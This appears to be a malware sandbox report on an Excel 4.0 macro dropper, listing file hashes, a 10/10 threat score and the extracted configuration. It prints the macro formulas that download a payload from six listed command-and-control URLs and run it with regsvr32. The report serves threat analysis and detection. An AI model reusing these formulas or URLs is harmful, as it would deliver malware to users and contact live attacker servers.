General

  • Target

    a0cfd78c95fabe9745c343acab8dab4bffc72f538f1ca781c629d75b6273effc

  • Size

    45KB

  • Sample

    241120-s2hd3syckd

  • MD5

    0a50fafea0c83f5de828cd2c91ad83eb

  • SHA1

    825bea68ee3aaf3549f8c467ab810077820d04db

  • SHA256

    a0cfd78c95fabe9745c343acab8dab4bffc72f538f1ca781c629d75b6273effc

  • SHA512

    6840398b6a78fceee4d69d750036d84ddaf882076848e63d86fc7a052766967d08b000513b91fd0e1a53fd82f96ff4976a16aee8c51532c55ae9de20c4414497

  • SSDEEP

    768:aqLrVo43DOevZCwrvtZmzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Ud0U2tCo:JrVo43DwtT5fTR4Lh1NisFYBc3cr+U2T

Score
10/10

Malware Config

Extracted

Rule
  • Excel 4.0 XLM Macro

C2
  • http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/
  • http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/
  • http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/
  • https://getlivetext.com/Pectinacea/AL5FVpjleCW/
  • http://janshabd.com/Zgye2/
  • https://justforanime.com/stratose/PonwPXCl/

Attributes
  • formulas (one XLM 4.0 macro cell per line)

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/","..\enu.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/","..\enu.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/","..\enu.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://getlivetext.com/Pectinacea/AL5FVpjleCW/","..\enu.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/Zgye2/","..\enu.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://justforanime.com/stratose/PonwPXCl/","..\enu.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
    =RETURN()

Extracted

Language
  • xlm4.0

Source
  • URLs

  • xlm40.dropper: http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/
  • xlm40.dropper: http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/
  • xlm40.dropper: http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
